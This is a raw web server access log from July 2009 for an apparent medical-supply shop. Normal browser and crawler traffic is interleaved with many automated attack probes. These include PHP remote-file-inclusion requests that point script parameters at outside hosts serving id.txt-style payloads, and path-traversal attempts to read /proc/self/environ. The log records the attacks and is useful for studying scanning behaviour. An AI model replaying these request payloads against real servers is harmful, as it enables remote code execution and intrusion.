190.144.44.36 - - [17/Jul/2009:00:38:51 -0400] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:38:51 -0400] "GET /logs/access_log.Q109051100//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.72.53.116 - - [17/Jul/2009:00:38:52 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://abiona.de/pics/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:39:00 -0400] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:39:00 -0400] "GET //show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:39:00 -0400] "GET /logs/access_log.Q109051100//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.68.70 - - [17/Jul/2009:00:39:25 -0400] "GET /images/items/index4_impltmotrs.jpg HTTP/1.1" 200 4772 "-" "Googlebot-Image/1.0"
76.172.23.28 - - [17/Jul/2009:00:39:36 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:45 -0400] "GET /promo.htm HTTP/1.1" 301 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:45 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 46020 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:46 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:46 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:47 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:48 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:48 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:48 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:48 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:48 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:49 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:50 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:51 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:51 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:51 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.172.23.28 - - [17/Jul/2009:00:39:51 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
76.173.27.99 - - [17/Jul/2009:00:39:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko)"
91.121.89.135 - - [17/Jul/2009:00:40:00 -0400] "GET /logs/access_log.Q109060800//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:41:13 -0400] "GET /logs/access_log.Q109051100%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:00:41:28 -0400] "GET /logs/access_log.Q109051100%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:00:41:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.204.127.201 - - [17/Jul/2009:00:43:29 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://74.54.28.74/~bbsaccom/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
200.204.127.201 - - [17/Jul/2009:00:43:30 -0400] "GET /?sourcedir=http://74.54.28.74/~bbsaccom/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
200.204.127.201 - - [17/Jul/2009:00:43:31 -0400] "GET /logs/?sourcedir=http://74.54.28.74/~bbsaccom/id.txt?? HTTP/1.1" 200 9860 "-" "libwww-perl/5.803"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:03 -0400] "GET /logs/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:04 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:44:04 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.204.127.201 - - [17/Jul/2009:00:44:04 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://74.54.28.74/~bbsaccom/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
206.225.23.4 - - [17/Jul/2009:00:44:08 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.132.13.182 - - [17/Jul/2009:00:45:16 -0400] "GET /logs/access_log.Q109052700/?sourcedir=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
189.132.13.182 - - [17/Jul/2009:00:45:17 -0400] "GET /?sourcedir=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
189.132.13.182 - - [17/Jul/2009:00:45:18 -0400] "GET /logs/?sourcedir=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 200 9860 "-" "libwww-perl/5.808"
189.132.13.182 - - [17/Jul/2009:00:45:43 -0400] "GET /logs/access_log.Q109061000/?sourcedir=http://www.netion.com.br/teste/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
206.225.23.4 - - [17/Jul/2009:00:46:02 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:46:06 -0400] "GET /logs/access_log.Q109062100%20%20/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:46:48 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.145.31.242 - - [17/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109051100//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
218.145.31.242 - - [17/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109051400//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
218.145.31.242 - - [17/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
206.225.23.4 - - [17/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.145.31.242 - - [17/Jul/2009:00:46:49 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [17/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109051100//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109051400//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109051100//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109051400//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
72.30.161.230 - - [17/Jul/2009:00:47:14 -0400] "GET /logs/error_log.Q109062900 HTTP/1.0" 200 3131493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [17/Jul/2009:00:47:23 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:00:47:24 -0400] "GET /logs/access_log.Q109062100/errors.php?error=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.161.230 - - [17/Jul/2009:00:47:15 -0400] "GET /logs/error_log.Q109062900 HTTP/1.0" 200 3131493 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.119.39.63 - - [17/Jul/2009:00:48:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
121.119.39.63 - - [17/Jul/2009:00:48:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
121.119.39.63 - - [17/Jul/2009:00:48:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
121.119.39.63 - - [17/Jul/2009:00:48:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
77.221.130.14 - - [17/Jul/2009:00:49:37 -0400] "GET /logs//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:49:37 -0400] "GET //admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:49:39 -0400] "GET /logs/access_log.Q109061300%20%20//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:49:54 -0400] "GET /logs//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:49:54 -0400] "GET //admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:49:55 -0400] "GET /logs/access_log.Q109061300%20%20//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.16.115.69 - - [17/Jul/2009:00:50:28 -0400] "GET //?path%5Bdocroot%5D=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.16.115.69 - - [17/Jul/2009:00:50:28 -0400] "GET /logs//?path%5Bdocroot%5D=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 9865 "-" "Mozilla/5.0"
62.16.115.69 - - [17/Jul/2009:00:50:32 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.16.115.69 - - [17/Jul/2009:00:50:32 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:00:51:55 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/Jul/2009:00:51:55 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/Jul/2009:00:51:55 -0400] "GET /e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
77.221.130.14 - - [17/Jul/2009:00:52:01 -0400] "GET //admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:52:01 -0400] "GET /logs//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:52:01 -0400] "GET /logs/access_log.Q109061300//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [17/Jul/2009:00:52:01 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.14 - - [17/Jul/2009:00:52:02 -0400] "GET //admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:52:02 -0400] "GET /logs//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:00:52:02 -0400] "GET /logs/access_log.Q109061300//admin/include/lib.module.php?mod_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:00:52:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.105.239 - - [17/Jul/2009:00:52:57 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.239 - - [17/Jul/2009:00:52:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.230.156.161 - - [17/Jul/2009:00:54:11 -0400] "GET /e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
58.72.53.116 - - [17/Jul/2009:00:54:11 -0400] "GET /logs/access_log.Q109052500%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://abiona.de/pics/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:00:54:11 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:00:54:11 -0400] "GET /logs/access_log.Q109060600/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
58.72.53.116 - - [17/Jul/2009:00:54:18 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://abiona.de/pics/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
211.230.156.161 - - [17/Jul/2009:00:54:30 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
123.143.98.5 - - [17/Jul/2009:00:56:02 -0400] "GET /logs/access_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/Jul/2009:00:56:02 -0400] "GET /logs/error_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
